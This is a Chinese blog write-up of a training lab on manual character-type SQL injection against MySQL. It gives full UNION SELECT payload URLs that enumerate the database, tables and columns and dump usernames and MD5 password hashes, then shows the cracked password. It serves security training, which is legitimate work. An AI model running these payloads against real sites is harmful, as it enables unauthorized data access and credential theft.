墨者学院--SQL手工注入漏洞测试(MySQL数据库-字符型)

本文详细记录了一次SQL注入攻击的过程,从发现注入点到利用注入漏洞获取数据库名、表名及字段信息,最终解密密码并成功登录。通过此案例,展示了SQL注入的常见手法和防范措施的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目意思:通过找这个页面存在的字符型sql注入获得登录需要的账号和密码,登录进去之后就能得到key。

解题步骤:查看登录url,没有思路;尝试各种姿势登录无果,有很强的过滤;点击登录框下方的公告,能够进入,url长得很像存在注入。

添加单引号报错,存在注入

http://219.153.49.228:48295/new_list.php?id=tingjigonggao%27

order by 判断字段数,一共四个字段

修改id后的参数使其报错(不然只会执行正确的id查询语句),然后联合查询四个字段,2,3能够显示在页面上

替换2为database(),查询到数据库名mozhe_discuz_stormgroup

替换database()为其他的语句爆破表名,得到表名notice,stormgroup_member

http://219.153.49.228:48295/new_list.php?id=tingjigongga%27%20union%20select%201,group_concat(table_name),version(),4%20from%20information_schema.tables%20where%20table_schema=%27mozhe_discuz_stormgroup%27--+

继续替换语句爆破stormgroup_member中的列名,得到列名id,name,password,status

http://219.153.49.228:48295/new_list.php?id=tingjigongga%27%20union%20select%201,2,group_concat(column_name),4%20from%20information_schema.columns%20where%20column_name=%27stormgroup_member%27--+

读取name和password里面的字段,这里记得使用group_concat因为name和password都不止一个字段,读出来的第二个password值才是有用的密码

http://219.153.49.228:48295/new_list.php?id=tingjigongga%27%20union%20select%201,group_concat(name),group_concat(password),4%20from%20stormgroup_member--+

得到name为mozhe,password为md5加密值313a4d42278b12895982f8923ba9bdab

解密得到明文为470339,登录之后就能拿到key

 

 

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值